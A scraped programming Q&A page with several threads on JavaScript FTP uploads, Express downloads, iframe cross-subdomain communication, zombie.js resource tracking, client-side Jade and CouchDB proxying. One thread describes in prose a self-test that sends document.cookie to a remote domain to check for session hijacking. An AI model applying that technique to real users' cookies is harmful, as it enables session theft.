I dont understand why cant javascript make ftp calls?. Why do we have to make such a request using server?
Even Browsers have ability to authenticate and browse a ftp server. Maybe use browser api's to do it?
Ok, answering my own question here.
I went through Mozilla docs on XMLHTTPRequest. It specifically says -
Despite its name, XMLHttpRequest can be used to retrieve any type of data, not just XML, and it supports protocols other than HTTP (including file and ftp).
So, I am satisfied with this. JavaScript can make calls to ftp using this.
The title of this question suggests the requester is keen on understanding if an FTP transfer could be implemented using JavaScript. However looking at the the answer by the same requester it appears that the question was just to know if URLs with FTP protocols can be used with JS and possibly HTML tags. The answer is yes. Even a simple <a> tag supports FTP URLs in the href attribute. Hope this helps the new readers. And yes, the XMLHttpRequest AJAX object does enable calling a URL with an FTP protocol.
Cheers.
There is a JavaScript library at http://ftp.apixml.net/ that allows FTP file uploads via JavaScript.
In this case, technically, the ftpjs server is making the FTP connection to the FTP server, but the instructions are being passed via JavaScript. So this particular library is designed primarily to allow developers add a basic file upload mechanism without writing sever-side code.
Under the hood, it uses the HTML5 FileReader to read the file to a base64 string, and then posts this using CORS AJAX back to the server.
// Script from http://ftp.apixml.net/
// Copyright 2017 http://ftp.apixml.net/, DO NOT REMOVE THIS COPYRIGHT NOTICE
var Ftp = {
createCORSRequest: function (method, url) {
var xhr = new XMLHttpRequest();
if ("withCredentials" in xhr) {
// Check if the XMLHttpRequest object has a "withCredentials" property.
// "withCredentials" only exists on XMLHTTPRequest2 objects.
xhr.open(method, url, true);
} else if (typeof XDomainRequest != "undefined") {
// Otherwise, check if XDomainRequest.
// XDomainRequest only exists in IE, and is IE's way of making CORS requests.
xhr = new XDomainRequest();
xhr.open(method, url);
} else {
// Otherwise, CORS is not supported by the browser.
xhr = null;
}
return xhr;
},
upload: function(token, files) {
var file = files[0];
var reader = new FileReader();
reader.readAsDataURL(file);
reader.addEventListener("load",
function() {
var base64 = this.result;
var xhr = Ftp.createCORSRequest('POST', "http://ftp.apixml.net/upload.aspx");
if (!xhr) {
throw new Error('CORS not supported');
}
xhr.onreadystatechange = function() {
if (xhr.readyState == 4 && xhr.status == 200) {
Ftp.callback(file);
}
};
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send("token=" + token + "&data=" + encodeURIComponent(base64) + "&file=" + file.name);
},
false);
},
callback: function(){}
};
its very difficult to FTP data(BIGfile) to backup server without using HTTP protocol in a web application.
Lets say, S1-( Client Browser ),
S2-(code container server),
S3-(Files Backup server) and we want to upload 2gb file from s1 using FTP.
use case diagram
This can be done by "JavaApplet" . we can embed uploader applet in webapplication. This applet will run inside browser sand box.
go through link
sample code for ftp using applet
provided you have to enable java on your browser.
Related
I have and API link what automatically starts downloading file if I follow it in address bar. Let's call it my-third-party-downloading-link-com.
But when in Express framework I set res.redirect(my-third-party-downloading-link-com). I get status code 301 and can see file content in Preview tab in developer tools. But I can't make Browser downloading this file.
My appropriate request handler is following:
downloadFeed(req, res) {
const { jobId, platform, fileName } = req.query;
const host = platform === 'production' ? configs.prodHost :
configs.stageHost;
const downloadLink = `${host}/api/v1/feedfile/${jobId}`;
// I also tried with these headers
// res.setHeader('Content-disposition', 'attachment;
// filename=${fileName}.gz');
// res.setHeader('Content-Type', 'application/x-gzip');
res.redirect(downloadLink)
}
P.S Now, to solve this problem, I build my-third-party-downloading-link-com on back-end, send it with res.end and then:
window.open(**my-third-party-downloading-link-com**, '_blank').
But I don't like this solution. How can I tell browser to start downloading content form this third-party API ?
According to the documentation, you should use res.download() to force a browser to prompt the user for download.
http://expressjs.com/es/api.html#res.download
I have two sub domains content and www under the domain example.com. Content from content.example.com is being presented in www.example.com via an iframe.
Because the content on content.example.com needs to communicate to www.example.com I've set document.domain="example.com" and also set allow-scripts and allow-same-origin on the iframe.
I'm concerned that if users can upload the content to be displayed in the iframe it could be exploitable, i.e., send the content of the cookies to a remote domain to hijack the session or other security exploits.
I've setup another domain, www.example2.com and put an AJAX request in the iframed content at content.example.com to test my theory and am sending document.cookie to the remote domain. This results in the _ga cookies being sent to the remote domain. I've allowed header('Access-Control-Allow-Origin: *') on the remote domain so it doesn't cause any issues.
Why are only the _ga cookies being sent? I have a number of other cookies in there on the same domain and path as the _ga cookies yet they aren't sent. Are there other security risks in doing this? Ideally I'd like it only possible for communication between content.example.com and www.example.com and it looks like it's mostly doing this, except for Google Analytics cookies, which will mean that others might be able to do it too.
You can use JSONP to communicate different domains, regardless of cross-domain settings and policies.
However JSONP requires the server side to build the callback function with the returned data as a parameter.
I would suggest to load plain Javascript content from the server, which has the same cross-domain independence and security as a JSON request.
Say you have a Javascript file, data.js, in content.example.com, or a service returning the same content as the file in the response,
with a JSON object, prefixed with a variable assignment:
result = {
"string1": "text1",
"object1": {
"string2": "text2",
"number1": 5.6
},
"number2": 7,
"array1": ["text3", "text4"]
}
Then, in your web page, in www.example.com, you can have a script with function loadJS,
which loads the server response as a script:
var loadJS = function (url, callback) {
var script = document.createElement('script');
script.type = "text/javascript";
script.src = url;
script.onload = function (ev) {
callback(window.result);
delete window.result;
this.parentNode.removeChild(this);
};
document.body.appendChild(script);
};
window.onload = function () {
loadJS('http://content.example.com/data.js', function (data) {
console.log(data);
});
};
Same function can be used in content.example.com for requests in the opposite direction.
In order to set cookies or perform any other functionality available in JS,
the response script, data.js, may contain a function rather than a JSON object:
result = (function () {
document.cookie = "cookie1=Value1; cookie2=Value2;";
return true;
})();
I'm currently looking for a way to track all requests made from a Website in zombie.js. The idea is to get all information about loaded content (eg. tracking pixel for ads, analytics tags, images, css ...). Basically the Network Monitor from the dev Tools in a headless browser.
I'm currently stuck at this point:
var Browser = require("zombie");
var url = "http://stackoverflow.com/";
var browser = new Browser();
browser.visit(url, function(err) {
for (var i = browser.resources.length - 1; i >= 0; i--) {
console.log(browser.resources[i].request.url)
}
})
This is probably the most basic Set Up and will not track anything except of some .js request. Also I can't track loaded files which are loaded by some external Script. Best example is the Google Tagmanager which will "hide" all files which are loaded by the Tag Manager.
Would be great if somebody would have a idea how to solve this issue.
Thanks in advance
Daniel
What you want to find out is called Resources, and you can access them via browser.resources, like
browser.visit(url).then(function(){
console.log(browser.resources); // array with downloaded resources
});
You can also creates pipes to monitor the resources being downloaded real-time:
browser.pipeline.addHandler(function(browser, request, response){
console.log(request, response);
return response;
});
browser.visit(url).then(function(){
console.log('successful visit');
});
tl;dr
Is there a way to use Jade completely client-side like any of the other JavaScript template engines (e.g., Mustache, Handlebars or Nunjucks), so that it loads includes via ajax?
More Info:
I have a web application that is not running on Node (unfortunately due to various vendors not providing libraries for Node yet) and I have really started liking the syntax and capabilities of Jade. Unfortunately, it seems like everything in Jade requires Node in some capacity, either in the development flow or on the server side. I definitely cannot use it server-side and would prefer not to introduce it to the development cycle just for templating.
It seems like all that would be necessary is to package up the dependencies (this can be done with browserify) and to implement fs to read files with ajax. Is there some implementation of this already?
Also, the time taken to compile once per file, per session is not really a concern for this application.
I actually found out the way to do this, completely on the client side:
Use browserify CDN to obtain a client-side bundle for the node package.
Implement the 'readFileSync' function in the 'fs' module in the bundle to use a synchronous XmlHttpRequest and retrieve the file from the server (it is currently empty so no function exists)
Viola!
UPDATE:
Here is my implementation:
2:[function(require,module,exports){
module.exports = {
cache: { },
readFileSync: function(path){
return this.cache[path] || (this.cache[path] = (function(){
var request = new XMLHttpRequest();
request.open('GET', path + '?_=' + $.time(), false);
request.send();
if (request.status === 200) {
return request.responseText;
}
else {
throw 'Unable to load template: ' + path;
}
}).call());
}
}},{}]
I have made a couchdb design document which works perfectly on the following url
http://localhost:5984/db/_design/app/index.html
Now the problem is i am trying to fetch the page contents and display it from node js but only the html page is displayed the linked css and js files are not working and when i tried to narrow down the problem i found that the css and js files are suppose to have the login credentials of the couchdb and is not linking I even tried adding the auth header in the response parameter but still no luck
var http = require('http');
var json;
var root = new Buffer("admin:pass").toString('base64');
http.createServer(function(req, res) {
res.setHeader('Authorization', root);
res.writeHead(200, { 'Content-Type':'text/html' });
couchPage();
res.end(json);
}).listen(8080);
function couchPage() {
var options = {
hostname: 'localhost',
port: 5984,
path: '/db/_design/app/index.html',
auth: 'admin:pass',
method: 'GET'
};
var req = http.request(options, function(res) {
res.setEncoding('utf8');
res.on('data', function (chunk) {
json = chunk;
});
});
req.end();
}
could any one please guide me where am i wrong
I think this has nothing to do with couchdb authorization. The problem is that you do not perform any routing on your nodejs server. That is, the browser makes a request to localhost:8080 and receives the content of /db/_design/app/index.html as an answer. Now, the browser detects a link to a stylesheet, say "style.css". It performs a request to localhost:8080/style.css but your nodejs server simply ignores the "style.css" part of the request. Instead, the client will receive the content of /db/_design/app/index.html again!
If you want to serve attachments of your design document through nodejs, you have to parse the request first and then retrieve the corresponding document from couchdb. However, I don't think that you actually want to do this. Either you want to use couchdb in a traditional way behind nodejs (not directly accessible from the client) and then you would just use it as a database with your html (or template) files stored on disk. Or you want to directly expose couchdb to the client and make nodejs listen to events via the couchdb _changes feed.